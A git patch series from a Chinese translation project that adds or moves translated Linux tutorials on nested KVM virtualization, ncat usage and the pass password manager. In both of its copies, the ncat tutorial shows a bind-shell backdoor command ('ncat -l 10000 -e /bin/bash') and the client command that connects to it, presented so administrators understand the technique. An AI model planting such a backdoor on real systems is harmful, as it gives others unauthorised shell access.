KVM on CentOS 7 - RHEL 7.md diff --git a/translated/20171212 How to enable Nested Virtualization in KVM on CentOS 7 - RHEL 7.md b/translated/20171212 How to enable Nested Virtualization in KVM on CentOS 7 - RHEL 7.md new file mode 100644 index 0000000000..a43e2889ae --- /dev/null +++ b/translated/20171212 How to enable Nested Virtualization in KVM on CentOS 7 - RHEL 7.md @@ -0,0 +1,123 @@ +zjon Translating +如何在 CentOS 7 / RHEL 7 的 KVM 上启用嵌套虚拟化 +====== +**嵌套虚拟化**意味着在虚拟机内配置虚拟化环境。换句话说,我们可以说嵌套虚拟化是虚拟机管理程序的一个特性,它允许我们通过**虚拟化管理程序**(主机)的硬件加速在虚拟服务器内安装核运行虚拟机。 + +在这篇文章中,我们将讨论如何在 CentOS 7 / RHEL 7 的 KVM 上启用嵌套虚拟化。我假定您已经配置过 KVM 管理程序。如果您不熟悉如何安装和配置 KVM 管理程序,请参考一下文章。 + +让我们跳进虚拟化管理程序,验证您的 KVM 主机是否启用了嵌套虚拟化。 + + +基于 Intel 的处理器运行以下命令, +``` +[root@kvm-hypervisor ~]# cat /sys/module/kvm_intel/parameters/nested +N +[root@kvm-hypervisor ~]# +``` + +基于 AMD 的处理器运行以下命令, + +``` +[root@kvm-hypervisor ~]# cat /sys/module/kvm_amd/parameters/nested +N +[root@kvm-hypervisor ~]# +``` + +一下命令输出 'N' 表示嵌套虚拟化是禁用的。如果我们得到的输出是 'Y' 则表示在您的主机已启用嵌套虚拟化 + +现在启用嵌套虚拟化,使用以下内容创建一个文件名为 "**/etc/modprobe.d/kvm-nested.conf**" 的文件 +``` +[root@kvm-hypervisor ~]# vi /etc/modprobe.d/kvm-nested.conf +options kvm-intel nested=1 +options kvm-intel enable_shadow_vmcs=1 +options kvm-intel enable_apicv=1 +options kvm-intel ept=1 +``` + +保存并退出文件 + +现在移除 '**kvm_intel**' 模块然后通过 modprobe 命令添加同样的模块。在移除模块之前,确保虚拟机已关机,否则我们会得到像 "**modprobe: FATAL: Module kvm_intel is in use**" 这样的错误信息。 +``` +[root@kvm-hypervisor ~]# modprobe -r kvm_intel +[root@kvm-hypervisor ~]# modprobe -a kvm_intel +[root@kvm-hypervisor ~]# +``` + +现在验证嵌套虚拟化功能是否启用。 +``` +[root@kvm-hypervisor ~]# cat /sys/module/kvm_intel/parameters/nested +Y +[root@kvm-hypervisor ~]# +``` + +#### + +测试嵌套虚拟化 + +假设我们在 KVM 管理程序上有一台名为 "director" 的虚拟机,我已经启用了嵌套虚拟化。在测试之前,确保 CPU 模式为 "host-modle" 或 "host-passthrough" ,使用 Virt-Manager 或 virtsh 编译命令检查虚拟机 cpu 模式。 + +![cpu_mode_vm_kvm][1] + +![cpu_mode_vm_kvm][2] + +现在登录 director 这台虚拟机并运行 lscpu 和 lsmod 命令 + +``` +[root@kvm-hypervisor ~]# ssh 192.168.126.1 -l root +root@192.168.126.1's password: +Last login: Sun Dec 10 07:05:59 2017 from 192.168.126.254 +[root@director ~]# lsmod | grep kvm +kvm_intel             170200  0 +kvm                   566604  1 kvm_intel +irqbypass              13503  1 kvm +[root@director ~]# +[root@director ~]# lscpu +``` + +![lscpu_command_rhel7_centos7][1] + +![lscpu_command_rhel7_centos7][3] + +让我们试着在 director 这台虚拟机的虚拟管理器 GUI 或 virt-install 创建一台虚拟机,在我的情况下我使用 virt-install 命令 + +``` +[root@director ~]# virt-install  -n Nested-VM  --description "Test Nested VM"  --os-type=Linux  --os-variant=rhel7  --ram=2048  --vcpus=2  --disk path=/var/lib/libvirt/images/nestedvm.img,bus=virtio,size=10  --graphics none  --location /var/lib/libvirt/images/CentOS-7-x86_64-DVD-1511.iso --extra-args console=ttyS0 +Starting install... +Retrieving file .treeinfo...                                                   | 1.1 kB  00:00:00 +Retrieving file vmlinuz...                                                     | 4.9 MB  00:00:00 +Retrieving file initrd.img...                                                  |  37 MB  00:00:00 +Allocating 'nestedvm.img'                                                      |  10 GB  00:00:00 +Connected to domain Nested-VM +Escape character is ^] +[    0.000000] Initializing cgroup subsys cpuset +[    0.000000] Initializing cgroup subsys cpu +[    0.000000] Initializing cgroup subsys cpuacct +[    0.000000] Linux version 3.10.0-327.el7.x86_64 (builder@kbuilder.dev.centos.org) (gcc version 4.8.3 20140911 (Red Hat 4.8.3-9) (GCC) ) #1 SMP Thu Nov 19 22:10:57 UTC 2015 +……………………………………………… +``` + +![cli-installer-virt-install-command-kvm][1] + +![cli-installer-virt-install-command-kvm][4] + +这证实了嵌套虚拟化已成功启用,因为我们能在虚拟机内创建虚拟机。 + +这篇文章到此结束,请分享您的反馈和意见。 + +-------------------------------------------------------------------------------- + +via: https://www.linuxtechi.com/enable-nested-virtualization-kvm-centos-7-rhel-7/ + +作者:[Pradeep Kumar][a] +译者:[zjon](https://github.com/zjon) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.linuxtechi.com +[1]:https://www.linuxtechi.com/wp-content/plugins/lazy-load/images/1x1.trans.gif +[2]:https://www.linuxtechi.com/wp-content/uploads/2017/12/cpu_mode_vm_kvm.jpg +[3]:https://www.linuxtechi.com/wp-content/uploads/2017/12/lscpu_command_rhel7_centos7-1024x408.jpg +[4]:https://www.linuxtechi.com/wp-content/uploads/2017/12/cli-installer-virt-install-command-kvm.jpg + + From da1f3cc9b5f379eab644437f49081b248fdbaa84 Mon Sep 17 00:00:00 2001 From: zjon Date: Fri, 29 Dec 2017 23:09:40 +0800 Subject: [PATCH 0874/1627] =?UTF-8?q?=E6=9B=B4=E6=96=B0=E6=96=87=E4=BB=B6?= =?UTF-8?q?=E8=B7=AF=E5=BE=84?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...to enable Nested Virtualization in KVM on CentOS 7 - RHEL 7.md | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename translated/{ => tech}/20171212 How to enable Nested Virtualization in KVM on CentOS 7 - RHEL 7.md (100%) diff --git a/translated/20171212 How to enable Nested Virtualization in KVM on CentOS 7 - RHEL 7.md b/translated/tech/20171212 How to enable Nested Virtualization in KVM on CentOS 7 - RHEL 7.md similarity index 100% rename from translated/20171212 How to enable Nested Virtualization in KVM on CentOS 7 - RHEL 7.md rename to translated/tech/20171212 How to enable Nested Virtualization in KVM on CentOS 7 - RHEL 7.md From 2df0fa8de6470522b0da2d144e3a23b22d04911a Mon Sep 17 00:00:00 2001 From: Markgolzh Date: Fri, 29 Dec 2017 23:19:34 +0800 Subject: [PATCH 0875/1627] =?UTF-8?q?=E7=BF=BB=E8=AF=91=E4=B8=AD=20by=20zk?= =?UTF-8?q?y001?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit 非常感兴趣的话题,马甲不管是markgolzh还是zky001,都会仔仔细细认认真真拿出最高水平翻译这篇文章。 --- sources/tech/20171222 10 keys to quick game development.md | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/sources/tech/20171222 10 keys to quick game development.md b/sources/tech/20171222 10 keys to quick game development.md index e65ad11812..05b92883a3 100644 --- a/sources/tech/20171222 10 keys to quick game development.md +++ b/sources/tech/20171222 10 keys to quick game development.md @@ -1,3 +1,4 @@ +翻译中 by zky001 10 keys to quick game development ====== ![配图](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/computer_keyboard_laptop_development_code_woman.png?itok=vbYz6jjb) @@ -71,7 +72,7 @@ Have you participated in Open Jam or another a game jam and have other advice? O via: https://opensource.com/article/17/12/10-keys-rapid-open-source-game-development 作者:[Ryan Estes][a] -译者:[译者ID](https://github.com/译者ID) +译者:[zky001](https://github.com/zky001) 校对:[校对者ID](https://github.com/校对者ID) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 From 4122031e10ddfdc99067432c649293f481d56e88 Mon Sep 17 00:00:00 2001 From: wxy Date: Sat, 30 Dec 2017 00:19:44 +0800 Subject: [PATCH 0876/1627] PRF&PUB:20171206 10 useful ncat (nc) Command Examples for Linux Systems.md @lujun9972 --- ...(nc) Command Examples for Linux Systems.md | 212 ++++++++++++++++++ ...(nc) Command Examples for Linux Systems.md | 199 ---------------- 2 files changed, 212 insertions(+), 199 deletions(-) create mode 100644 published/20171206 10 useful ncat (nc) Command Examples for Linux Systems.md delete mode 100644 translated/tech/20171206 10 useful ncat (nc) Command Examples for Linux Systems.md diff --git a/published/20171206 10 useful ncat (nc) Command Examples for Linux Systems.md b/published/20171206 10 useful ncat (nc) Command Examples for Linux Systems.md new file mode 100644 index 0000000000..9b686b1f6a --- /dev/null +++ b/published/20171206 10 useful ncat (nc) Command Examples for Linux Systems.md @@ -0,0 +1,212 @@ +10 个例子教你学会 ncat (nc) 命令 +====== + +[![nc-ncat-command-examples-Linux-Systems](https://www.linuxtechi.com/wp-content/uploads/2017/12/nc-ncat-command-examples-Linux-Systems.jpg)][1] + +`ncat` 或者说 `nc` 是一款功能类似 `cat` 的工具,但是是用于网络的。它是一款拥有多种功能的 CLI 工具,可以用来在网络上读、写以及重定向数据。 它被设计成可以被脚本或其他程序调用的可靠的后端工具。同时由于它能创建任意所需的连接,因此也是一个很好的网络调试工具。 + +`ncat`/`nc` 既是一个端口扫描工具,也是一款安全工具,还能是一款监测工具,甚至可以做为一个简单的 TCP 代理。 由于有这么多的功能,它被誉为是网络界的瑞士军刀。 这是每个系统管理员都应该知道并且掌握它。 + +在大多数 Debian 发行版中,`nc` 是默认可用的,它会在安装系统的过程中自动被安装。 但是在 CentOS 7 / RHEL 7 的最小化安装中,`nc` 并不会默认被安装。 你需要用下列命令手工安装。 + +``` +[root@linuxtechi ~]# yum install nmap-ncat -y +``` + +系统管理员可以用它来审计系统安全,用它来找出开放的端口然后保护这些端口。 管理员还能用它作为客户端来审计 Web 服务器、telnet 服务器、邮件服务器等, 通过 `nc` 我们可以控制发送的每个字符,也可以查看对方的回应。 + +我们还可以用它捕获客户端发送的数据以此来了解这些客户端是做什么的。 + +在本文中,我们会通过 10 个例子来学习如何使用 `nc` 命令。 + +### 例子: 1) 监听入站连接 + +通过 `-l` 选项,`ncat` 可以进入监听模式,使我们可以在指定端口监听入站连接。 完整的命令是这样的: + +``` +$ ncat -l port_number +``` + +比如, + +``` +$ ncat -l 8080 +``` + +服务器就会开始在 8080 端口监听入站连接。 + +### 例子: 2) 连接远程系统 + +使用下面命令可以用 `nc` 来连接远程系统, + +``` +$ ncat IP_address port_number +``` + +让我们来看个例子, + +``` +$ ncat 192.168.1.100 80 +``` + +这会创建一个连接,连接到 IP 为 192.168.1.100 的服务器上的 80 端口,然后我们就可以向服务器发送指令了。 比如我们可以输入下面内容来获取完整的网页内容 + +``` +GET / HTTP/1.1 +``` + +或者获取页面名称, + +``` +GET / HTTP/1.1 +``` + +或者我们可以通过以下方式获得操作系统指纹标识, + +``` +HEAD / HTTP/1.1 +``` + +这会告诉我们使用的是什么软件来运行这个 web 服务器的。 + +### 例子: 3) 连接 UDP 端口 + +默认情况下,`nc` 创建连接时只会连接 TCP 端口。 不过我们可以使用 `-u` 选项来连接到 UDP 端口, + +``` +$ ncat -l -u 1234 +``` + +现在我们的系统会开始监听 UDP 的 1234 端口,我们可以使用下面的 `netstat` 命令来验证这一点, + +``` +$ netstat -tunlp | grep 1234 +udp 0 0 0.0.0.0:1234 0.0.0.0:* 17341/nc +udp6 0 0 :::1234 :::* 17341/nc +``` + +假设我们想发送或者说测试某个远程主机 UDP 端口的连通性,我们可以使用下面命令, + +``` +$ ncat -v -u {host-ip} {udp-port} +``` + +比如: + +``` +[root@localhost ~]# ncat -v -u 192.168.105.150 53 +Ncat: Version 6.40 ( http://nmap.org/ncat ) +Ncat: Connected to 192.168.105.150:53。 +``` + +### 例子: 4) 将 `nc` 作为聊天工具 + +`nc` 也可以作为聊天工具来用,我们可以配置服务器监听某个端口,然后从远程主机上连接到服务器的这个端口,就可以开始发送消息了。 在服务器这端运行: + +``` +$ ncat -l 8080 +``` + +在远程客户端主机上运行: + +``` +$ ncat 192.168.1.100 8080 +``` + +之后开始发送消息,这些消息会在服务器终端上显示出来。 + +### 例子: 5) 将 `nc` 作为代理 + +`nc` 也可以用来做代理。比如下面这个例子, + +``` +$ ncat -l 8080 | ncat 192.168.1.200 80 +``` + +所有发往我们服务器 8080 端口的连接都会自动转发到 192.168.1.200 上的 80 端口。 不过由于我们使用了管道,数据只能被单向传输。 要同时能够接受返回的数据,我们需要创建一个双向管道。 使用下面命令可以做到这点: + +``` +$ mkfifo 2way +$ ncat -l 8080 0<2way | ncat 192.168.1.200 80 1>2way +``` + +现在你可以通过 `nc` 代理来收发数据了。 + +### 例子: 6) 使用 `nc` 拷贝文件 + +`nc` 还能用来在系统间拷贝文件,虽然这么做并不推荐,因为绝大多数系统默认都安装了 `ssh`/`scp`。 不过如果你恰好遇见个没有 `ssh`/`scp` 的系统的话, 你可以用 `nc` 来作最后的努力。 + +在要接受数据的机器上启动 `nc` 并让它进入监听模式: + +``` +$ ncat -l 8080 > file.txt +``` + +现在去要被拷贝数据的机器上运行下面命令: + +``` +$ ncat 192.168.1.100 8080 --send-only < data.txt +``` + +这里,`data.txt` 是要发送的文件。 `-–send-only` 选项会在文件拷贝完后立即关闭连接。 如果不加该选项, 我们需要手工按下 `ctrl+c` 来关闭连接。 + +我们也可以用这种方法拷贝整个磁盘分区,不过请一定要小心。 + +### 例子: 7) 通过 `nc` 创建后门 + +`nc` 命令还可以用来在系统中创建后门,并且这种技术也确实被黑客大量使用。 为了保护我们的系统,我们需要知道它是怎么做的。 创建后门的命令为: + +``` +$ ncat -l 10000 -e /bin/bash +``` + +`-e` 标志将一个 bash 与端口 10000 相连。现在客户端只要连接到服务器上的 10000 端口就能通过 bash 获取我们系统的完整访问权限: + +``` +$ ncat 192.168.1.100 10000 +``` + +### 例子: 8) 通过 `nc` 进行端口转发 + +我们通过选项 `-c` 来用 `nc` 进行端口转发,实现端口转发的语法为: + +``` +$ ncat -u -l 80 -c 'ncat -u -l 8080' +``` + +这样,所有连接到 80 端口的连接都会转发到 8080 端口。 + +### 例子: 9) 设置连接超时 + +`nc` 的监听模式会一直运行,直到手工终止。 不过我们可以通过选项 `-w` 设置超时时间: + +``` +$ ncat -w 10 192.168.1.100 8080 +``` + +这回导致连接 10 秒后终止,不过这个选项只能用于客户端而不是服务端。 + +### 例子: 10) 使用 `-k` 选项强制 `nc` 待命 + +当客户端从服务端断开连接后,过一段时间服务端也会停止监听。 但通过选项 `-k` 我们可以强制服务器保持连接并继续监听端口。 命令如下: + +``` +$ ncat -l -k 8080 +``` + +现在即使来自客户端的连接断了也依然会处于待命状态。 + +自此我们的教程就完了,如有疑问,请在下方留言。 + +-------------------------------------------------------------------------------- + +via: https://www.linuxtechi.com/nc-ncat-command-examples-linux-systems/ + +作者:[Pradeep Kumar][a] +译者:[lujun9972](https://github.com/lujun9972) +校对:[wxy](https://github.com/wxy) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.linuxtechi.com/author/pradeep/ +[1]:https://www.linuxtechi.com/wp-content/uploads/2017/12/nc-ncat-command-examples-Linux-Systems.jpg diff --git a/translated/tech/20171206 10 useful ncat (nc) Command Examples for Linux Systems.md b/translated/tech/20171206 10 useful ncat (nc) Command Examples for Linux Systems.md deleted file mode 100644 index 914aea87ea..0000000000 --- a/translated/tech/20171206 10 useful ncat (nc) Command Examples for Linux Systems.md +++ /dev/null @@ -1,199 +0,0 @@ -10 个例子教你学会 ncat (nc) 命令 -====== - [![nc-ncat-command-examples-Linux-Systems](https://www.linuxtechi.com/wp-content/uploads/2017/12/nc-ncat-command-examples-Linux-Systems.jpg)][1] - -ncat 或者说 nc 是一款功能类似 cat 的网络工具。它是一款拥有多种功能的 CLI 工具,可以用来在网络上读,写以及重定向数据。 它被设计成可以被脚本或其他程序调用的可靠后端工具。 同时由于它能创建任意所需的连接,因此也是一个很好的网络调试工具。 - -ncat/nc 既是一个端口扫描工具,也是一款安全工具, 还能是一款检测工具,甚至可以做一个简单的 TCP 代理。 由于有这么多的功能,它被誉为是网络界的瑞士军刀。 这是每个系统管理员都应该知道并且掌握它。 - -在大多数 Debian 发行版中,`nc` 是默认可用的,它会在安装系统的过程中自动被安装。 但是在 CentOS 7 / RHEL 7 的最小化安装中,`nc` 并不会默认被安装。 你需要用下列命令手工安装。 - -``` -[root@linuxtechi ~]# yum install nmap-ncat -y -``` - -系统管理员可以用它来审计系统安全,用它来找出开放的端口然后保护这些端口。 管理员还能用它作为客户端来审计 Web 服务器, 远程登陆服务器, 邮件服务器等, 通过 `nc` 我们可以控制发送的每个字符,也可以查看对方的回应。 - -我们还可以 o 用它捕获客户端发送的数据一次来了解这些客户端是做什么的。 - -在本文中,我们会通过 10 个例子来学习如何使用 `nc` 命令。 - -### 例子: 1) 监听入站连接 - -通过 `l` 选项,ncat 可以进入监听模式,使我们可以在指定端口监听入站连接。 完整的命令是这样的 - -$ ncat -l port_number - -比如, - -``` -$ ncat -l 8080 -``` - -服务器就会开始在 8080 端口监听入站连接。 - -### 例子: 2) 连接远程系统 - -使用下面命令可以用 nc 来连接远程系统, - -$ ncat IP_address port_number - -让我们来看个例子, - -``` -$ ncat 192。168。1。100 80 -``` - -这会创建一个连接,连接到 IP 为 192。168。1。100 的服务器上的 80 端口,然后我们就可以向服务器发送指令了。 比如我们可以输入下面内容来获取完整的网页内容 - -GET / HTTP/1.1 - -或者获取页面名称, - -GET / HTTP/1.1 - -或者我们可以通过以下方式获得操作系统指纹标识, - -HEAD / HTTP/1.1 - -这会告诉我们使用的是什么软件来运行这个 web 服务器的。 - -### 例子: 3) 连接 UDP 端口 - -默认情况下,nc 创建连接时只会连接 TCP 端口。 不过我们可以使用 `u` 选项来连接到 UDP 端口, - -``` -$ ncat -l -u 1234 -``` - -现在我们的系统会开始监听 udp 的'1234'端口,我们可以使用下面的 netstat 命令来验证这一点, - -``` -$ netstat -tunlp | grep 1234 -udp 0 0 0。0。0。0:1234 0。0。0。0:* 17341/nc -udp6 0 0 :::1234 :::* 17341/nc -``` - -假设我们想发送或者说测试某个远程主机 UDP 端口的连通性,我们可以使用下面命令, - -$ ncat -v -u {host-ip} {udp-port} - -比如: - -``` -[root@localhost ~]# ncat -v -u 192。168。105。150 53 -Ncat: Version 6。40 ( http://nmap.org/ncat ) -Ncat: Connected to 192。168。105。150:53。 -``` - -#### 例子: 4) 将 NC 作为聊天工具 - -NC 也可以作为聊天工具来用,我们可以配置服务器监听某个端口,然后从远程主机上连接到服务器的这个端口,就可以开始发送消息了。 在服务器这端运行: - -``` -$ ncat -l 8080 -``` - -在远程客户端主机上运行: - -``` -$ ncat 192。168。1。100 8080 -``` - -之后开始发送消息,这些消息会在服务器终端上显示出来。 - -#### 例子: 5) 将 NC 作为代理 - -NC 也可以用来做代理。比如下面这个例子, - -``` -$ ncat -l 8080 | ncat 192。168。1。200 80 -``` - -所有发往我们服务器 8080 端口的连接都会自动转发到 192。168。1。200 上的 80 端口。 不过由于我们使用了管道,数据只能被单向传输。 要同时能够接受返回的数据,我们需要创建一个双向管道。 使用下面命令可以做到这点: - -``` -$ mkfifo 2way -$ ncat -l 8080 0<2way | ncat 192。168。1。200 80 1>2way -``` - -现在你可以通过 nc 代理来收发数据了。 - -#### 例子: 6) 使用 nc/ncat 拷贝文件 - -NC 还能用来在系统间拷贝文件,虽然这么做并不推荐,因为绝大多数系统默认都安装了 ssh/scp。 不过如果你恰好遇见个没有 ssh/scp 的系统的话, 你可以用 nc 来作最后的努力。 - -在要接受数据的机器上启动 nc 并让它进入监听模式: - -``` -$ ncat -l 8080 > file.txt -``` - -现在去要被拷贝数据的机器上运行下面命令: - -``` -$ ncat 192。168。1。100 8080 --send-only < data.txt -``` - -这里,data.txt 是要发送的文件。 –send-only 选项会在文件拷贝完后立即关闭连接。 如果不加该选项, 我们需要手工按下 ctrl+c to 来关闭连接。 - -我们也可以用这种方法拷贝整个磁盘分区,不过请一定要小心。 - -#### 例子: 7) 通过 nc/ncat 创建后门 - -NC 命令还可以用来在系统中创建后门,并且这种技术也确实被黑客大量使用。 为了保护我们的系统,我们需要知道它是怎么做的。 创建后门的命令为: - -``` -$ ncat -l 10000 -e /bin/bash -``` - -‘e‘ 标志将一个 bash 与端口 10000 相连。现在客户端只要连接到服务器上的 10000 端口就能通过 bash 获取我们系统的完整访问权限: - -``` -$ ncat 192。168。1。100 10000 -``` - -#### 例子: 8) 通过 nc/ncat 进行端口转发 - -我们通过选项 `c` 来用 NC 进行端口转发,实现端口转发的语法为: - -``` -$ ncat -u -l 80 -c 'ncat -u -l 8080' -``` - -这样,所有连接到 80 端口的连接都会转发到 8080 端口。 - -#### 例子: 9) 设置连接超时 - -ncat 的监听模式会一直运行,直到手工终止。 不过我们可以通过选项 `w` 设置超时时间: - -``` -$ ncat -w 10 192。168。1。100 8080 -``` - -这回导致连接 10 秒后终止,不过这个选项只能用于客户端而不是服务端。 - -#### 例子: 10) 使用 -k 选项强制 ncat 待命 - -当客户端从服务端断开连接后,过一段时间服务端也会停止监听。 但通过选项 `k` 我们可以强制服务器保持连接并继续监听端口。 命令如下: - -``` -$ ncat -l -k 8080 -``` - -现在即使来自客户端的连接断了也依然会处于待命状态。 - -自此我们的教程就完了,如有疑问,请在下方留言。 - --------------------------------------------------------------------------------- - -via: https://www.linuxtechi.com/nc-ncat-command-examples-linux-systems/ - -作者:[Pradeep Kumar][a] -译者:[lujun9972](https://github.com/lujun9972) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://www.linuxtechi.com/author/pradeep/ -[1]:https://www.linuxtechi.com/wp-content/uploads/2017/12/nc-ncat-command-examples-Linux-Systems.jpg From 0172c808cfa9c2019971da3f5b4433d8271c86f7 Mon Sep 17 00:00:00 2001 From: darksun Date: Sat, 30 Dec 2017 14:13:15 +0800 Subject: [PATCH 0877/1627] translate done: 20171121 How to organize your passwords using pass password manager.md --- ...r passwords using pass password manager.md | 150 ------------------ ...r passwords using pass password manager.md | 150 ++++++++++++++++++ 2 files changed, 150 insertions(+), 150 deletions(-) delete mode 100644 sources/tech/20171121 How to organize your passwords using pass password manager.md create mode 100644 translated/tech/20171121 How to organize your passwords using pass password manager.md diff --git a/sources/tech/20171121 How to organize your passwords using pass password manager.md b/sources/tech/20171121 How to organize your passwords using pass password manager.md deleted file mode 100644 index 5cd203e403..0000000000 --- a/sources/tech/20171121 How to organize your passwords using pass password manager.md +++ /dev/null @@ -1,150 +0,0 @@ -translating by lujun9972 -How to organize your passwords using pass password manager -====== - -### Objective - -Learn to organize your passwords using the "pass" password manager on linux - -### Requirements - - * Root permissions needed to install required packages - -### Difficulty - -EASY - -### Conventions - - * **#** \- requires given command to be executed with root privileges either directly as a root user or by use of `sudo` command - * **$** \- given command to be executed as a regular non-privileged user -### Introduction - -If you have the good habit to never use the same password for more than one purpose, you have probably already felt the need for a password manager. There are many alternatives to choose from on linux, both proprietary (if you dare) and open source. If you, like me, think that simplicity it's the way to go, you may be interested in knowing however to use the `pass` utility. - -### First steps - -Pass it's a password manager that it's really a wrapper on well trusted and useful tools that you probably already use every day, like `gpg` and `git`. Although graphical interfaces exists for it, it is designed to work from command line: therefore it will work even on headless machines. - -### Step 1 - installation - -Pass it's easily available on the majority of linux distributions, you can obtain via package manager: - -#### Fedora -``` -# dnf install pass -``` - -#### RHEL and CentOS - -Pass is not available in the official repositories, but you can obtain it from `epel`. To make the latter source available on CentOS7, all you have to do is: -``` -# yum install epel-release -``` - -On Red Hat Enterprise Linux, however, the package that enables this extra source it's not available; you can download it from the official EPEL site. - -#### Debian and Ubuntu -``` -# apt-get install pass -``` - -#### Arch Linux -``` -# pacman -S pass -``` - -### Initialize the password store - -Once we have `pass` installed, we can begin to use it and configure it. First of all, since pass relies on `gpg` to encrypt our passwords and store it in a secure way, we must have a `gpg keypair` already in place. - -First thing to do is to initialize the `password store`: this is simply the directory where all your gpg-encrypted password will be saved. By default it will be created as a hidden directory inside your `$HOME`, however you can specify an alternative path, by using the `PASSWORD_STORE_DIR` environment variable. Let's proceed: -``` -$ pass init -``` - -The `password-store` directory will be created. Now, let's try to store our first password: -``` -$ pass edit mysite -``` - -At this point an instance of our default text editor will be opened, and all we have to do is to enter our password in it. The file will be encrypted using gpg, and stored as `mysite.gpg` inside the password-store directory. - -Pass stores encrypted files in a directory tree, which means that we can logically group more files in subdirectories to obtain a better organization, we will just have to specify it on file creation, for example: -``` -$ pass edit foo/bar -``` - -Just as above, this will prompt for password insertion, but the file will be created inside the `foo` subdirectory of the password store. To visualize the file structure, all we have to do is to use the `pass` command without any arguments: -``` - -$ pass -Password Store -├── foo -│   └── bar -└── mysite - -``` - -Whenever we need to modify our password, we will just have to repeat the same command used to create it, as shown above. - -### Access the passwords - -There are basically two ways we can access our password: the first one is to display it on the terminal, by using: -``` -pass mysite -``` - -However a better way is to let pass copy it directly to the clipboard, by using the `-c` option: -``` -pass -c mysite -``` - -In this case the clipboard will be cleared after `45` seconds. In both cases, a prompt will appear where you will have to insert your gpg password. - -### Generate passwords - -Pass can also generate (and automatically store) secure passwords for us. Say we want to generate a password composed by 15 characters: alphanumeric and symbols. The command to use will be: -``` -pass generate mysite 15 -``` - -If we want our password to contain only alphanumeric characters we can use the `--no-symbols` option. The generated password will displayed onscreen. Alternatively, it can be copied directly to the clipboard, using the `--clip` or `-c` option. You can even generate a QR code, by using the `-q` or `--qrcode` option: - -![qrcode][1] - -As you can see from the screenshot above, the qrcode has been generated, but since a password for `mysite` already existed at the time we invoked the command, pass showed a prompt to let us confirm that we want to override it. - -Pass uses the `/dev/urandom` device as a (pseudo) random data generator to create the passwords, while it uses the `xclip` utility to copy them to the clipboard, and `qrencode` to display them as qrcodes. This modularity is, in my opinion, its greatest strength: it doesn't reinvent anything, it just wraps common used tools to reach its goal. - -You can also rename, copy or delete files from the password store, respectively using the `pass mv`, `pass cp`, or `pass rm` commands. - -### Using the password store as a git repository - -Another great feature of `pass` is that it can treat the password store as a git repository: letting us manage our password more easily, under a version control system. -``` -pass git init -``` - -This will create the git repository, and automatically create a commit with all the existing files. The next step is to specify the remote repository to track: -``` -pass git remote add -``` - -We can manage this repository just like we do with all other repository we use. The only "difference" is that every time we add or modify a password, `pass` will automatically add the file to the index and create a commit. - -A graphical interface exists for `pass`, it is called `qtpass` and it's available also for Windows and MacOs. It's also possible to access the password store from firefox, using the `PassFF` extension. You will find more detailed informations on the project site. Go on an try `pass`, you will not regret it! - - --------------------------------------------------------------------------------- - -via: https://linuxconfig.org/how-to-organize-your-passwords-using-pass-password-manager - -作者:[Egidio Docile][a] -译者:[lujun9972](https://github.com/lujun9972) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://linuxconfig.org -[1]:/images/pass-manager-qrcode.png diff --git a/translated/tech/20171121 How to organize your passwords using pass password manager.md b/translated/tech/20171121 How to organize your passwords using pass password manager.md new file mode 100644 index 0000000000..b129a5daf9 --- /dev/null +++ b/translated/tech/20171121 How to organize your passwords using pass password manager.md @@ -0,0 +1,150 @@ +使用 pass 密码管理器管理你的密码 +====== + +### 目标 + +学习使用 "pass" 密码管理器来组织你的密码 + +### 需求 + + * 需要 root 权限来安装需要的包 + +### 难度 + +简单 + +### 约定 + + * **#** - 执行指定命令需要 root 权限,可以是直接使用 root 用户来执行或者使用 `sudo` 命令来执行 + * **$** - 使用非特权普通用户执行指定命令 + +### 介绍 + +如果你有根据目的不同设置不同密码的好习惯,你可能已经感受到要一个密码管理器的必要性了。在 Linux 上有很多选择,可以是专利软件(如果你敢的话)也可以是开源软件。如果你跟我一样喜欢简洁的话,你可能会对 `pass` 感兴趣。 + +### First steps + +Pass 作为一个密码管理器,其实际上是对类似 `gpg` 和 `git` 等可信赖的实用工具的一种封装。虽然它也有图形界面,但它专门设计能成在命令行下工作的:因此它也可以在 headless machines 上工作 (LCTT 注:根据 wikipedia 的说法,所谓 headless machines 是指没有显示器、键盘和鼠标的机器,一般通过网络链接来控制)。 + +### 步骤 1 - 安装 + +Pass 在主流的 linux 发行版中都是可用的,你可以通过包管理器安装: + +#### Fedora +``` +# dnf install pass +``` + +#### RHEL and CentOS + +Pass 不在官方仓库中,但你可以从 `epel` 中获取道它。要在 CentOS7 上启用后面这个源,只需要执行: +``` +# yum install epel-release +``` + +然而在 Red Hat 企业版的 Linux 上,这个额外的源是不可用的;你需要从官方的 EPEL 网站上下载它。 + +#### Debian and Ubuntu +``` +# apt-get install pass +``` + +#### Arch Linux +``` +# pacman -S pass +``` + +### 初始化密码仓库 + +安装好 `pass` 后,就可以开始使用和配置它了。首先,由于 pass 依赖 `gpg` 来对我们的密码进行加密并以安全的方式进行存储,我们必须准备好一个 `gpg 密钥对`。 + +首先我们要初始化 `密码仓库`:这就是一个用来存放 gpg 加密后的密码的目录。默认情况下它会在你的 `$HOME` 创建一个隐藏目录,不过你也可以通过使用 `PASSWORD_STORE_DIR` 这一环境变量来指定另一个路径。让我们运行: +``` +$ pass init +``` + +然后`密码仓库`目录就创建好了。现在,让我们来存储我们第一个密码: +``` +$ pass edit mysite +``` + +这会打开默认文本编辑器,我么只需要输入密码就可以了。输入的内容会用 gpg 加密并存储为密码仓库目录中的 `mysite.gpg` 文件。 + +Pass 